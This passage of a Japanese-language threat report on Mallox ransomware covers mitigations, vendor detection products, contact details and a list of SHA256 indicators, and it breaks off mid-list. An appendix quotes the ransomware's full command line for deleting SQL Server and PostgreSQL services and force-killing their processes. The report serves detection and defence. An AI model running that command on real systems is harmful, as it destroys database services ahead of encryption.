\u30b0\u30eb\u30fc\u30d7\u306f\u3053\u3053\u6570\u304b\u6708\u6d3b\u52d5\u3092\u6d3b\u767a\u5316\u3055\u305b\u3066\u3044\u307e\u3059\u3002\u6700\u8fd1\u306e\u6c42\u4eba\u6d3b\u52d5\u3067\u63a1\u7528\u304c\u3046\u307e\u304f\u3044\u3051\u3070\u3055\u3089\u306b\u591a\u304f\u306e\u7d44\u7e54\u306b\u653b\u6483\u304c\u5e83\u304c\u308a\u304b\u306d\u307e\u305b\u3093\u3002<\/p>\n<p>\u5404\u7d44\u7e54\u306f<a href=\"https:\/\/start.paloaltonetworks.com\/2023-unit42-mitre-attack-recommendations\">\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 \u30d9\u30b9\u30c8 \u30d7\u30e9\u30af\u30c6\u30a3\u30b9<\/a>\u3092\u5b9f\u65bd\u3057\u3001<a href=\"https:\/\/start.paloaltonetworks.com\/2023-unit42-ransomware-extortion-report\" target=\"_blank\" rel=\"noopener\">\u73fe\u884c\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u8105\u5a01<\/a>\u304b\u3089\u81ea\u7d44\u7e54\u3092\u5b88\u308b\u6e96\u5099\u3092\u3057\u3066\u304f\u3060\u3055\u3044\u3002Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3060\u3051\u3067\u306a\u304f\u3001\u65e5\u548c\u898b\u7684\u306a\u307b\u304b\u306e\u72af\u7f6a\u30b0\u30eb\u30fc\u30d7\u306b\u5bfe\u3057\u3066\u3082\u3001\u3053\u3046\u3057\u305f\u5bfe\u7b56\u3092\u3057\u3066\u304a\u304f\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<p>Unit 42 \u30c1\u30fc\u30e0\u306f\u3001\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u306b\u63a5\u7d9a\u3055\u308c\u3066\u3044\u308b\u3059\u3079\u3066\u306e\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3092\u9069\u5207\u306b\u69cb\u6210\u3057\u3001\u3059\u3079\u3066\u306e\u30b7\u30b9\u30c6\u30e0\u306b\u30d1\u30c3\u30c1\u3092\u9069\u7528\u3057\u3001\u53ef\u80fd\u306a\u9650\u308a\u6700\u65b0\u72b6\u614b\u3067\u3042\u308b\u3068\u78ba\u8a8d\u3059\u308b\u3053\u3068\u3092\u63a8\u5968\u3057\u307e\u3059\u3002\u3053\u3046\u3057\u305f\u5bfe\u7b56\u3092\u3046\u307e\u304f\u4f7f\u3063\u3066\u653b\u6483\u5bfe\u8c61\u9818\u57df\u3092\u7e2e\u5c0f\u3059\u308c\u3070\u3001\u653b\u6483\u8005\u304c\u5229\u7528\u3067\u304d\u308b\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u624b\u6cd5\u3092\u5236\u9650\u3067\u304d\u307e\u3059\u3002<\/p>\n<p>XDR\/EDR \u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u3092\u5c0e\u5165\u3057\u3001\u30e1\u30e2\u30ea\u30fc\u5185\u306e\u30a4\u30f3\u30b9\u30da\u30af\u30b7\u30e7\u30f3 (\u691c\u67fb) \u3092\u5b9f\u65bd\u3057\u3001\u30d7\u30ed\u30bb\u30b9 \u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u6280\u8853\u3092\u691c\u51fa\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u8105\u5a01\u30cf\u30f3\u30c8\u3092\u884c\u3063\u3066\u3001\u300c\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u88fd\u54c1\u306e\u9632\u5fa1\u56de\u907f\u300d\u3001\u300c\u30e9\u30c6\u30e9\u30eb\u30e0\u30fc\u30d6\u3092\u884c\u3046\u30b5\u30fc\u30d3\u30b9 \u30a2\u30ab\u30a6\u30f3\u30c8\u300d\u3001\u300c\u30c9\u30e1\u30a4\u30f3\u7ba1\u7406\u8005\u306b\u95a2\u9023\u3059\u308b\u30e6\u30fc\u30b6\u30fc\u306e\u632f\u308b\u821e\u3044\u300d\u306a\u3069\u3067\u3001\u7570\u5e38\u306a\u632f\u308b\u821e\u3044\u306e\u5146\u5019\u304c\u898b\u3089\u308c\u306a\u3044\u304b\u63a2\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<h2><a id=\"post-129319-_mf3k1d3b3om7\"><\/a>\u4fdd\u8b77\u3068\u7de9\u548c\u7b56<\/h2>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\">Cortex XDR<\/a> \u306f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304c\u5b9f\u884c\u3059\u308b\u30d5\u30a1\u30a4\u30eb \u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u3084\u305d\u306e\u307b\u304b\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u691c\u51fa\u30fb\u9632\u6b62\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_129291\" aria-describedby=\"caption-attachment-129291\" style=\"width: 543px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129291 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-13.png\" alt=\"\u753b\u50cf 13 \u306f\u3001\u60aa\u610f\u306e\u3042\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u30d6\u30ed\u30c3\u30af\u3057\u3066\u3044\u308b Cortex XDR \u306e\u901a\u77e5\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\" width=\"543\" height=\"293\" \/><figcaption id=\"caption-attachment-129291\" class=\"wp-caption-text\">\u56f313. Mallox \u306e\u5b9f\u884c\u30d6\u30ed\u30c3\u30af\u306b\u3064\u3044\u3066\u306e\u30a8\u30f3\u30c9\u30e6\u30fc\u30b6\u30fc\u3078\u306e\u901a\u77e5<\/figcaption><\/figure>\n<figure id=\"attachment_129293\" aria-describedby=\"caption-attachment-129293\" style=\"width: 730px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129293 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-14.png\" alt=\"\u753b\u50cf 14 \u306f\u3001\u30e2\u30b8\u30e5\u30fc\u30eb\u3068\u30d5\u30a1\u30a4\u30eb\u306e\u5909\u66f4\u306e\u8aac\u660e\u3092\u793a\u3057\u3066\u3044\u308b Cortex XDR \/ XSIAM \u306e\u30a2\u30e9\u30fc\u30c8\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\" width=\"730\" height=\"56\" \/><figcaption id=\"caption-attachment-129293\" class=\"wp-caption-text\">\u56f314. Cortex XDR \/ XSIAM \u304c\u751f\u6210\u3057\u305f\u4e0d\u5be9\u306a\u30d5\u30a1\u30a4\u30eb\u5909\u66f4\u306b\u95a2\u3059\u308b\u30a2\u30e9\u30fc\u30c8\u3002\u3053\u3053\u3067\u306f\u691c\u8a3c\u306e\u305f\u3081\u300c\u691c\u51fa\u306e\u307f\u300d\u306e\u30e2\u30fc\u30c9\u306b\u8a2d\u5b9a\u3057\u3066\u3042\u308b<\/figcaption><\/figure>\n<p><a href=\"https:\/\/www.paloaltonetworks.com\/blog\/security-operations\/beating-alert-fatigue-with-cortex-xdr-smartscore-technology\/\" target=\"_blank\" rel=\"noopener\">SmartScore<\/a> \u306f\u3001\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u8abf\u67fb\u624b\u6cd5\u3068\u305d\u308c\u306b\u7d10\u3065\u304f\u30c7\u30fc\u30bf\u3092\u30cf\u30a4\u30d6\u30ea\u30c3\u30c9 \u30b9\u30b3\u30a2\u30ea\u30f3\u30b0 \u30b7\u30b9\u30c6\u30e0\u306b\u5909\u63db\u3059\u308b\u3001\u30e6\u30cb\u30fc\u30af\u306a ML \u30d9\u30fc\u30b9 \u30b9\u30b3\u30a2\u30ea\u30f3\u30b0 \u30a8\u30f3\u30b8\u30f3\u3067\u3059\u3002\u3053\u306e\u30a8\u30f3\u30b8\u30f3\u306b\u3088\u308a\u3001Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306b\u95a2\u9023\u3059\u308b\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u306f\u3001\u6700\u9ad8\u30ec\u30d9\u30eb\u306e\u91cd\u5927\u5ea6\u300c100\u300d\u3068\u30b9\u30b3\u30a2\u30ea\u30f3\u30b0\u3055\u308c\u307e\u3057\u305f (\u56f3 15)\u3002\u3053\u306e\u30bf\u30a4\u30d7\u306e\u30b9\u30b3\u30a2\u30ea\u30f3\u30b0\u306f\u3001\u30a2\u30ca\u30ea\u30b9\u30c8\u304c\u3069\u306e\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u304c\u3088\u308a\u7dca\u6025\u3067\u3042\u308b\u304b\u3092\u5224\u65ad\u3059\u308b\u306e\u306b\u5f79\u7acb\u3061\u3001\u8a55\u4fa1\u7406\u7531\u306b\u3064\u3044\u3066\u306e\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u3092\u63d0\u4f9b\u3057\u3001\u512a\u5148\u9806\u4f4d\u4ed8\u3051\u3092\u652f\u63f4\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_129295\" aria-describedby=\"caption-attachment-129295\" style=\"width: 672px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129295 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-15.png\" alt=\"\u753b\u50cf 15 \u306f\u3001SmartScore \u30d7\u30ed\u30b0\u30e9\u30e0\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u3053\u3053\u306b\u306f\u3001\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u60c5\u5831\u304c\u8a55\u4fa1\u3068\u3068\u3082\u306b\u30ea\u30b9\u30c8\u3055\u308c\u3001\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u304c\u305d\u306e\u91cd\u5927\u5ea6\u3067\u8a55\u4fa1\u3055\u308c\u305f\u7406\u7531\u304c\u793a\u3055\u308c\u307e\u3059\u3002\" width=\"672\" height=\"568\" \/><figcaption id=\"caption-attachment-129295\" class=\"wp-caption-text\">\u56f315. Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u306b\u95a2\u3059\u308b SmartScore \u306e\u60c5\u5831<\/figcaption><\/figure>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u88fd\u54c1\u3092\u3054\u5229\u7528\u306e\u304a\u5ba2\u69d8\u306f\u3001\u5f0a\u793e\u306e\u88fd\u54c1\u30fb\u30b5\u30fc\u30d3\u30b9\u306b\u3088\u308a Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306b\u5bfe\u3059\u308b\u4ee5\u4e0b\u306e\u4fdd\u8b77\u304c\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>\u30af\u30e9\u30a6\u30c9\u30d9\u30fc\u30b9\u306e\u8105\u5a01\u5206\u6790\u30b5\u30fc\u30d3\u30b9\u3067\u3042\u308b<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/wildfire\" target=\"_blank\" rel=\"noopener\">WildFire<\/a>\u306f\u3001\u65e2\u77e5\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u60aa\u610f\u306e\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u6b63\u78ba\u306b\u7279\u5b9a\u3057\u307e\u3059\u3002<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a>\u3068<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/dns-security\" target=\"_blank\" rel=\"noopener\">DNS Security<\/a>\u306f\u3001\u540c\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3092\u60aa\u610f\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u8b58\u5225\u3057\u307e\u3059\u3002<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.jp\/cortex\/cortex-xdr\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a>\u306f\u3001\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb\u3001Active Directory\u3001ID\u304a\u3088\u3073\u30a2\u30af\u30bb\u30b9\u7ba1\u7406\u30bd\u30ea\u30e5\u30fc\u30b7\u30e7\u30f3\u3001\u30af\u30e9\u30a6\u30c9 \u30ef\u30fc\u30af\u30ed\u30fc\u30c9\u3092\u542b\u3080\u8907\u6570\u306e\u30c7\u30fc\u30bf \u30bd\u30fc\u30b9\u304b\u3089\u306e\u30e6\u30fc\u30b6\u30fc \u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u5206\u6790\u3059\u308b\u3053\u3068\u306b\u3088\u308a\u3001\u30e6\u30fc\u30b6\u30fc\u304a\u3088\u3073\u30af\u30ec\u30c7\u30f3\u30b7\u30e3\u30eb \u30d9\u30fc\u30b9\u306e\u8105\u5a01\u3092\u691c\u51fa\u3057\u307e\u3059\u3002Cortex XDR \u306f\u3001\u6a5f\u68b0\u5b66\u7fd2\u3092\u4f7f\u3063\u3066\u30e6\u30fc\u30b6\u30fc \u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306e\u884c\u52d5\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u3082\u69cb\u7bc9\u3057\u307e\u3059\u3002Cortex XDR\u306f\u3001\u904e\u53bb\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3084\u30d4\u30a2\u30fc \u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3001\u671f\u5f85\u3055\u308c\u308b\u884c\u52d5\u3068\u65b0\u3057\u3044\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3068\u3092\u6bd4\u8f03\u3059\u308b\u3053\u3068\u306b\u3088\u308a\u3001\u30af\u30ec\u30c7\u30f3\u30b7\u30e3\u30eb \u30d9\u30fc\u30b9\u306e\u653b\u6483\u3092\u793a\u5506\u3059\u308b\u7570\u5e38\u306a\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u691c\u51fa\u3057\u307e\u3059\u3002Cortex XDR \u306f\u672c\u7a3f\u3067\u53d6\u308a\u4e0a\u3052\u305f\u653b\u6483\u306b\u95a2\u9023\u3057\u3001\u4ee5\u4e0b\u306e\u4fdd\u8b77\u3082\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002\n<ul>\n<li>\u65e2\u77e5\u306e\u60aa\u610f\u306e\u3042\u308b\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u3092\u9632\u6b62\u3059\u308b\u307b\u304b\u3001\u30ed\u30fc\u30ab\u30eb\u5206\u6790\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u3082\u3068\u3065\u304f\u6a5f\u68b0\u5b66\u7fd2\u3068<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/advanced-threat-prevention\" target=\"_blank\" rel=\"noopener\">Behavioral Threat Protection<\/a>\u306b\u3088\u3063\u3066\u672a\u77e5\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u3082\u9632\u6b62\u3057\u307e\u3059\u3002<\/li>\n<li>Cortex XDR 3.4 \u304b\u3089\u5229\u7528\u53ef\u80fd\u306b\u306a\u3063\u305f\u65b0\u305f\u306a Credential Gathering Protection \u3092\u4f7f\u3044\u3001\u30af\u30ec\u30c7\u30f3\u30b7\u30e3\u30eb\u3092\u53ce\u96c6\u3059\u308b\u30c4\u30fc\u30eb\u3084\u6280\u8853\u304b\u3089\u4fdd\u8b77\u3057\u307e\u3059\u3002<\/li>\n<li>Cortex XDR \u30d0\u30fc\u30b8\u30e7\u30f33.4 \u4ee5\u964d\u306e Anti-Webshell Protection \u3092\u4f7f\u3044\u3001\u8105\u5a01\u306b\u3088\u308bWeb\u30b7\u30a7\u30eb\u304b\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306e\u30c9\u30ed\u30c3\u30d7\u3084\u5b9f\u884c\u304b\u3089\u4fdd\u8b77\u3057\u307e\u3059\u3002<\/li>\n<li>Anti-Exploitation \u30e2\u30b8\u30e5\u30fc\u30eb\u3068 Behavioral Threat Protection \u3092\u4f7f\u3044\u3001ProxyShell\u3001ProxyLogon\u3001OWASSRF \u3092\u542b\u3080\u3001\u3055\u307e\u3056\u307e\u306a\u8106\u5f31\u6027\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u304b\u3089\u4fdd\u8b77\u3057\u307e\u3059\u3002<\/li>\n<li>Cortex XDR Pro \u306f\u3001Cortex Analytics \u306b\u3088\u308a\u3001\u30af\u30ec\u30c7\u30f3\u30b7\u30e3\u30eb \u30d9\u30fc\u30b9\u653b\u6483\u3092\u542b\u3080\u3001<a href=\"https:\/\/docs.paloaltonetworks.com\/cortex\/cortex-xdr\/cortex-xdr-analytics-alert-reference\/cortex-xdr-analytics-alert-reference\/analytics-alerts-by-required-data-source\" target=\"_blank\" rel=\"noopener\">\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u5f8c\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3<\/a>\u3092\u691c\u51fa\u3057\u307e\u3059\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>\u4fb5\u5bb3\u306e\u61f8\u5ff5\u304c\u3042\u308a\u5f0a\u793e\u306b\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u30ec\u30b9\u30dd\u30f3\u30b9\u306b\u95a2\u3059\u308b\u3054\u76f8\u8ac7\u3092\u306a\u3055\u308a\u305f\u3044\u5834\u5408\u306f\u3001<a href=\"https:\/\/start.paloaltonetworks.jp\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">\u3053\u3061\u3089\u306e\u30d5\u30a9\u30fc\u30e0<\/a>\u304b\u3089\u3054\u9023\u7d61\u3044\u305f\u3060\u304f\u304b\u3001infojapan@paloaltonetworks.com\u307e\u3067\u30e1\u30fc\u30eb\u306b\u3066\u3054\u9023\u7d61\u3044\u305f\u3060\u304f\u304b\u3001\u4e0b\u8a18\u306e\u96fb\u8a71\u756a\u53f7\u307e\u3067\u304a\u554f\u3044\u5408\u308f\u305b\u304f\u3060\u3055\u3044(\u3054\u76f8\u8ac7\u306f\u5f0a\u793e\u88fd\u54c1\u306e\u304a\u5ba2\u69d8\u306b\u306f\u9650\u5b9a\u3055\u308c\u307e\u305b\u3093)\u3002<\/p>\n<ul>\n<li>\u5317\u7c73\u30d5\u30ea\u30fc\u30c0\u30a4\u30e4\u30eb: 866.486.4842 (866.4.UNIT42)<\/li>\n<li>\u6b27\u5dde: +31.20.299.3130<\/li>\n<li>\u30a2\u30b8\u30a2\u592a\u5e73\u6d0b: +65.6983.8730<\/li>\n<li>\u65e5\u672c: +81.50.1790.0200<\/li>\n<\/ul>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306f\u30d5\u30a1\u30a4\u30eb \u30b5\u30f3\u30d7\u30eb\u3084\u4fb5\u5bb3\u306e\u5146\u5019\u306a\u3069\u3092\u3075\u304f\u3080\u3053\u308c\u3089\u306e\u8abf\u67fb\u7d50\u679c\u3092Cyber Threat Alliance (CTA) \u306e\u30e1\u30f3\u30d0\u30fc\u3068\u5171\u6709\u3057\u307e\u3057\u305f\u3002CTA \u306e\u30e1\u30f3\u30d0\u30fc\u306f\u3053\u306e\u30a4\u30f3\u30c6\u30ea\u30b8\u30a7\u30f3\u30b9\u3092\u4f7f\u3063\u3066\u3001\u304a\u5ba2\u69d8\u306b\u4fdd\u8b77\u3092\u8fc5\u901f\u306b\u63d0\u4f9b\u3057\u3001\u60aa\u610f\u306e\u3042\u308b\u30b5\u30a4\u30d0\u30fc\u653b\u6483\u8005\u3092\u4f53\u7cfb\u7684\u306b\u963b\u5bb3\u3067\u304d\u307e\u3059\u3002\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f<a href=\"https:\/\/www.cyberthreatalliance.org\" target=\"_blank\" rel=\"noopener\">Cyber Threat Alliance<\/a>\u306b\u3066\u3054\u78ba\u8a8d\u304f\u3060\u3055\u3044\uff61<\/p>\n<h2><a id=\"post-129319-_nug33n70cwpd\"><\/a>\u4ed8\u9332<\/h2>\n<h3><a id=\"post-129319-_o3guxdy9aptq\"><\/a>Mallox \u304c SQL \u95a2\u9023\u30b5\u30fc\u30d3\u30b9\u306e\u505c\u6b62\u30fb\u524a\u9664\u306b\u4f7f\u3046\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3<\/h3>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">\"C:\\Windows\\System32\\cmd.exe\" \/ C sc delete \"MSSQLFDLauncher\" &amp;&amp; sc delete \"MSSQLSERVER\" &amp;&amp; sc delete \"SQLSERVERAGENT\" &amp;&amp; sc delete \"SQLBrowser\" &amp;&amp; sc delete \"SQLTELEMETRY\" &amp;&amp; sc delete \"MsDtsServer130\" &amp;&amp; sc delete \"SSISTELEMETRY130\" &amp;&amp; sc delete \"SQLWriter\" &amp;&amp; sc delete \"MSSQL$VEEAMSQL2012\" &amp;&amp; sc delete \"SQLAgent$VEEAMSQL2012\" &amp;&amp; sc delete \"MSSQL\" &amp;&amp; sc delete \"SQLAgent\" &amp;&amp; sc delete \"MSSQLServerADHelper100\" &amp;&amp; sc delete \"MSSQLServerOLAPService\" &amp;&amp; sc delete \"MsDtsServer100\" &amp;&amp; sc delete \"ReportServer\" &amp;&amp; sc delete \"SQLTELEMETRY$HL\" &amp;&amp; sc delete \"TMBMServer\" &amp;&amp; sc delete \"MSSQL$PROGID\" &amp;&amp; sc delete \"MSSQL$WOLTERSKLUWER\" &amp;&amp; sc delete \"SQLAgent$PROGID\" &amp;&amp; sc delete \"SQLAgent$WOLTERSKLUWER\" &amp;&amp; sc delete \"MSSQLFDLauncher$OPTIMA\" &amp;&amp; sc delete \"MSSQL$OPTIMA\" &amp;&amp; sc delete \"SQLAgent$OPTIMA\" &amp;&amp; sc delete \"ReportServer$OPTIMA\" &amp;&amp; sc delete \"msftesql$SQLEXPRESS\" &amp;&amp; sc delete \"postgresql-x64-9.4\" &amp;&amp; rem Kill \"SQL\" &amp;&amp; taskkill - f - im sqlbrowser.exe &amp;&amp; taskkill - f - im sqlwriter.exe &amp;&amp; taskkill - f - im sqlservr.exe &amp;&amp; taskkill - f - im msmdsrv.exe &amp;&amp; taskkill - f - im MsDtsSrvr.exe &amp;&amp; taskkill - f - im sqlceip.exe &amp;&amp; taskkill - f - im fdlauncher.exe &amp;&amp; taskkill - f - im Ssms.exe &amp;&amp; taskkill - f - im SQLAGENT.EXE &amp;&amp; taskkill - f - im fdhost.exe &amp;&amp; taskkill - f - im fdlauncher.exe &amp;&amp; taskkill - f - im sqlservr.exe &amp;&amp; taskkill - f - im ReportingServicesService.exe &amp;&amp; taskkill - f - im msftesql.exe &amp;&amp; taskkill - f - im pg_ctl.exe &amp;&amp; taskkill - f - im postgres.exe<\/span><\/p>\n<h2><a id=\"post-129319-_ydqdbjg0dngh\"><\/a>IoC (\u4fb5\u5bb3\u6307\u6a19)<\/h2>\n<h3><a id=\"post-129319-_c5eabp5mv1ww\"><\/a>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30b5\u30f3\u30d7\u30eb\u306e SHA256 \u30cf\u30c3\u30b7\u30e5:<\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">6c743c890151d0719150246382b5e0158e8abc4a29dd4b2f049ce7d313b1a330<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">b03f94c61528c9f3731a2e8da4975c072c9ed4e5372d3ec6b0939eebe01e54a4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">de9d3e17555e91072919dc700dc7e588cd52617debcad2f764ef9c7fbf6c9f7b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">2a549489e2455a2d84295604e29c727dd20d65f5a874209840ce187c35d9a439<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1c8b6d5b79d7d909b7ee22cccf8f71c1bd8182eedfb9960c94776620e4543d13<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">36269d1892283991a9db23492cd8efcd68af74060384b9686219a97f76a9989e<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">10eea0c13fd1a782c065627e23e7051edc1622f2eae5fbe138725369c12f4b6d<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">Df30d74ab6600c1532a14c53a7f08f1afd41ec63cf427a4b91b99c3c2524caba<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">0463277782f9e98b0e7a028cea0f689a81cf080fa0d64d4de8ef4803bb1bf03a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1f793f973fd906f9736aa483c613b82d5d2d7b0e270c5c903704f9665d9e1185<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e284ad63a832123240bd40b6c09565fae8525c00ddf308d5b8f5c8ce69ed6b09<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">e3a0bbd623db2b865fc3520c8d05e8b92016af2e535f0808460295cb8435836a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7c84eafb3b05f0d5316fae610d9404c54ef39383d0fe0e3c07407a26bb9f6750<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1276786fc51f3b7e987aa95ebff0a3e1e358ee4e86e2302e472f84710271af7b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">f730e83049c7fe81f6e4765ab91efbb7a373751d51fdafe697a4977dc7c1ea11<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">05194b34f8ff89facdd7b56d05826b08edaec9c6e444bdc32913e02cab01afd4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">c599bebc9ae54a54710008042361293d71475e5fbe8f0cbaceb6ee4565a72015<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">060ed94db064924a90065a5f4efb50f938c52619ca003f096482353e444bd096<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">90be90ad4fb906574f9e7afe587f0826a71152bfc32cfc665a58877562f2edd4<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">1b2727af9fc187cd5c932c6defe50b983ad7508b4196ad6c5ff5e96686277c56<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">a9543bc9612276863fc77b663fa3ff6efb85db69a01baa86c6dfabf73684b5c1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4e00f3e0e09d13e76da56009173098eefafc4ad50806583d5333990fa44e6420<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">6c109d098a1f44017f3937a71628d9dbd4d2ca8aa266656ee4720c37cc31558e<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7f8f1afa1390246409263e606aa05e2896b8d1da7018c534e67ca530a59ebda1<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">8e54c38bc3585c3163c3e25d037bcf55695c274aaea770f2f59f0a0910a4b572<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">724aa6dae72829e9812b753d188190e16fb64ac6cd39520897d917cfdccc5122<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">7164ba41639c8edcd9ff1cf41a806c9a23de566b56a7f34a0205ba1f84575a48<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">0e1c7ea4148e7473e15a8e55413d6972eec6e24ef365e9f629884f89645de71a<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">4ed74a205fad15c843174d7d8b30ae60a181e79f31cc30ebc683072f187e4cdd<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ee6fd436bf5aff181e3d4b9a944bf644076e902a1bbf622978b5e005522c1f77<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">ebdcf54719cceddffc3c254b0bfb1a2b2c8a136fa207293dbba8110f066d9c51<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">9a3050007e1c46e226e7c2c27d4703f63962803863290449193a0d0ca9661b3b<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">d6c51935d0597b44f45f1b36d65d3b01b6401593f95cb4c2786034072ad89b63<\/span><\/li>\n<li><span 